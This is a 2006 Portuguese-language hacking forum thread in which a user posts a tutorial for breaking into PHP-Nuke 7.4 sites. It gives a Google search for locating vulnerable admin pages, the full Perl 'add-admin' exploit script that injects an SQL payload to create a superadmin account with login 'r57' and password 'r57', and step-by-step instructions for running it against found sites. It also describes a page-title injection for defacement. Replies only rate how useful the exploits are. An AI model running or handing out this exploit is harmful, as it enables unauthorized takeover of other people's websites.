PHPnuke | exploits | tutoriais

Started by branco, 04 de March , 2006, 07:50:44 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

branco

Para caçar a vulnerabilidade iremos usar o google, basta entrar no site www.google.com.br e em seguida buscar por intitle:"PHP-Nuke Powered Site - Administration Menu".

Após isso, testaremos se o servidor está vulneravel, basta abrir o bloco de notas, salvar o exploit abaixo no diretorio do perl, depois vá no diretorio do perl pelo dos e faça o seguite comando, perl nomedoexploit.pl http://www.site.com.br/admin.php, agora vá no site que vc exploito e tente fazer login com r57 e password r57.
# r57phpnuke74.pl - very very lame PHP-Nuke 7.4 "add-admin" exploit
# -----------------------------------------------------------------
# by 1dt.w0lf .. RusH security team .. http://rst.void.ru
#
# this coded just for fun
# -----------------------------------------------------------------
# C:\>r57phpnuke74.pl http://volgorod.khn.ru/admin.php
# DONE!
# Now go to http://volgorod.khn.ru/admin.php and login via 'r57' as name and 'r57' as password
# jabi-dabi-duuuu ... stupid php-nuke coders =(
# -----------------------------------------------------------------
#
# *** php-nuke must be run via mysql > 4.0

use LWP::UserAgent;

if (@ARGV != 1)
 {
 print "usage: $0 [path_to_admin.php]\n";
 exit;
 }

$path = $ARGV[0];

$php_nuke = LWP::UserAgent->new() or die;
$php_nuke->post(
"$path",
{
"add_aid"         => "r57",                          ### login
"add_name"        => "r57",                          ### name
"add_pwd"         => "r57",                          ### password
"add_email"       => "r00t\@r00t.br",                ### mail
"admin"           => "eCcgVU5JT04gU0VMRUNUIDEvKjox", ### magic... =)
"add_radminsuper" => "1",                            ### yeap supa admina
"op"              => "AddAuthor"                     ### add me baby
}
);

print "DONE!\nNow go to $path and login via 'r57' as name and 'r57' as password";
exit;

Se tudo der certo, aparecera a seguinte imagem :



Tambem a uma outra 'vulnerabilidade' que permite mudar o codigo da pagina, é bem simples basta você entrar em um site que utilize phpnuke e fazer o seguinte comando www.site.com.br/?pagetitle e oque vc quiser

ae a pagina ficara como no exemplo abaixo :



Todas as vulnerabilidades relacionadas a phpnuke serão postadas aqui por mim, vo ver se pelomenos uma vez por semana posto algum tuto pra galera....
Thx e t+
Olha o trem... Quem vai ficar, quem vai partir? Quem vai chorar, quem vai sorrir?

Cloudy

Essa aí do titulo eu tava sabendo, ela não é tão nova, faz uns meses eu acho, e na minha opinião não tem muita utilidade. Mas a de cima é legal.

...by Cloudy
"You have to be trusted by the people tou lied to, so when they turn their back on you, you have the chance to the put the knife in." (Roger Waters)

...by Cloudy

Anonymous

Heys! O seu post é razoavel! Se bem que ambos já sao um pouco desactualizados... acho que o que tem alguma utilidade é o primeiro, mas mesmo assim só dá acesso ao painel de administrador do portal, não dando shell e o segundo na minha opiniao acho que nao tem qualquer tipo de utilidade, mas ok!

Abraços,